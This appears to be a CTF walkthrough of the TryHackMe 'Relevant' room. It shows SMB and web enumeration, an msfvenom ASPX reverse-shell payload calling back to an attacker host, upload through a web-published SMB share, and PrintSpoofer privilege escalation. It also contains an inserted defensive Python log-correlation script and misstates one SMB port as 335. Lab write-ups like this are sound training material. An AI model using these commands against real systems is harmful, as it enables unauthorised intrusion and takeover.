Relevant — TryHackMe Walkthrough

Ömer Erdal, published in System Weakness, Sep 30, 2023

Hello, everyone! I am here to lead you through a TryHackMe room that I found particularly captivating, titled ‘Relevant.’ While there are various methods available on the internet for obtaining a root shell on the vulnerable machine, I will be sharing my approach in this blog.

1. Enumeration

As usual, we will start by enumerating the target machine using a network scanner to identify open ports. To accomplish this, we can execute an Nmap command:

“nmap -sC -A -Pn 10.10.x.x”

This initial step will provide us with valuable information about the machine's exposed services and potential entry points.

Upon reviewing the output, we can observe that an HTTP server is running on port 80, SMB ports are accessible at 139 and 335, and port 3389 is designated for RDP (Remote Desktop Protocol). At this point, we can first check out the HTTP port and see if there is any clue left for us:

We are greeted with a default Windows Server page when accessing the HTTP service. No apparent anomalies were discovered in the page’s source code.

2. Exploitation

To delve deeper into our reconnaissance, our next step involves enumerating the SMB share using the built-in Kali tool ‘smbclient.’ Executing the following command will reveal the available shares on the target:

“smbclient -L \\\\10.10.x.x\\”

We have come across a share named ‘nt4wrksv.’ To conduct a more comprehensive enumeration of this share, we will need to specify the share name in the following manner:

“smbclient \\\\10.10.x.x\\nt4wrksv”

Fantastic! We have successfully gained access to the SMB share. With this access, we can begin our search for interesting files using basic SMB commands.

An interesting file, ‘passwords.txt,’ has caught our attention. Let’s investigate its contents. To accomplish this, we will start by using the ‘get’ command to download it onto our machine. Afterward, we can examine its contents.

There is a username-password combination encoded with Base64. There are many ways to decode Base64 data, from online websites to various tools within Kali Linux. For this task, I used the following command to decode it and retrieve the credentials:

“echo -n "encoded text" | base64 -d”

These credentials were expected to grant us access to the target. I attempted to use xfreerdp with both usernames, but unfortunately, I didn’t achieve the desired results. During my investigation, I discovered that there’s another open port at 49663, which wasn’t initially detected in my scan as it only covered the top 1000 most commonly used ports.

Let's run gobuster against each of the ports we just found with the following command:

“gobuster dir -u 10.10.x.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt”

We can see from the output that the /nt4wrksv directory was found with a 301 status code.

Let’s proceed to access this port and directory. Initially, there appears to be no visible content. However, since the directory bears the same name as the SMB share, let’s try appending ‘/passwords.txt’ to the URL to see if we can reach it, and indeed, we are able to view its contents:

This confirms that the web server is serving the same directory that is exposed as the SMB share, which gives us a potential point of entry: anything we write to the share becomes reachable over HTTP. Let’s use msfvenom to generate a reverse shell.

“msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=5619 -f aspx > reverse.aspx”

Now, our next step involves uploading this file to the SMB share using the ‘PUT’ command. Afterward, we should initiate a Netcat listener to prepare for the reverse shell.

We can now navigate to “http://TARGET_IP/nt4wrksv/reverse.aspx”

Success! The reverse shell connected back to our listener and we have a shell on the target:
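The chain just used, a file written to the share over SMB and then requested from the web directory that publishes it, is also what a defender can look for. The following is an added detection example, not part of the original walkthrough: it correlates constructed SMB write records with constructed IIS-style access log lines (simplified formats, not verbatim Event 5145 or W3C output) and flags server-side script files fetched shortly after being written through the share.

```python
import re
from datetime import datetime, timedelta

# Share name -> URL prefix under which the web server publishes the same directory.
SHARE_TO_URL = {"nt4wrksv": "/nt4wrksv"}
# Server-side script extensions that should never arrive through a file share.
SCRIPT_EXT = (".aspx", ".asp", ".ashx", ".asmx")

# Constructed SMB write records (simplified from Event 5145 WriteData audits):
# (timestamp, share, relative target name, client address)
SMB_WRITES = [
    ("2023-09-30 11:50:00", "nt4wrksv", "notes.txt", "10.10.x.x"),
    ("2023-09-30 12:00:05", "nt4wrksv", "reverse.aspx", "10.10.x.x"),
]

# Constructed IIS-style access log: date time method uri-stem port client-ip status
IIS_LOG = """\
2023-09-30 11:55:10 GET /nt4wrksv/passwords.txt 49663 10.10.x.x 200
2023-09-30 12:00:40 GET /nt4wrksv/reverse.aspx 49663 10.10.x.x 200
2023-09-30 12:01:00 GET /iisstart.htm 80 10.10.y.y 200
"""
IIS_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\d+) (\S+) (\d+)$")

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def correlate(smb_writes, iis_log, window=timedelta(minutes=10)):
    """Alert when a script file written over SMB is requested over HTTP within `window`."""
    alerts = []
    for line in iis_log.splitlines():
        m = IIS_RE.match(line)
        if not m:
            continue
        ts, _method, uri, port, client, status = m.groups()
        if not uri.lower().endswith(SCRIPT_EXT):
            continue  # static content served from the share is not the concern here
        for wts, share, rel, writer in smb_writes:
            prefix = SHARE_TO_URL.get(share)
            if prefix is None or uri.lower() != f"{prefix}/{rel}".lower():
                continue
            delta = parse_ts(ts) - parse_ts(wts)
            if timedelta(0) <= delta <= window:  # write happened first, within the window
                alerts.append({"file": uri, "port": int(port), "written_by": writer,
                               "requested_by": client, "status": int(status),
                               "seconds_after_write": int(delta.total_seconds())})
    return alerts

if __name__ == "__main__":
    print(correlate(SMB_WRITES, IIS_LOG))
```

The same logic applies to any share whose directory a web server publishes; the real fix is to stop publishing a writable share (or stop letting unauthenticated users write to it), and the correlation is the alarm for when that boundary has already been crossed.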

To locate the first flag, let’s navigate to the ‘Bob’ user’s directory and examine the contents of the Desktop. This will mark the completion of the initial stage of our mission.

3. Privilege Escalation

To gain privileged access on the target, I first tried WinPEAS, transferring it from my attacking machine. However, it did not uncover any critical vulnerabilities. I used the following commands to copy the file.

On the Attack Box
On the Target Machine

After spending some time searching for a solution, I executed the following command to check the current user’s privileges:

“whoami /priv”

Here we can observe that the ‘SeImpersonatePrivilege’ is enabled. This caught my attention because its description indicates ‘Impersonate a client after authentication.’ This suggests that we may have the opportunity to impersonate the administrator. After doing research on Google, I found that PrintSpoofer.exe may assist us in elevating our privileges. You can also utilize the following page: https://github.com/k4sth4/PrintSpoofer

After downloading the file to our attacker machine, we must transfer it to the target using the same commands I demonstrated earlier for WinPEAS.

Now that the binary is on the target, let’s execute it with the following command:

“.\PrintSpoofer64.exe -i -c cmd”

Excellent! We can now confirm that we have acquired a privileged shell.

The final task remaining is to find the root flag, which is located under the Desktop of the Administrator user.

Thank you very much for following along. I hope this has been helpful for your CTF challenge. Looking forward to the next one!

-Ömer
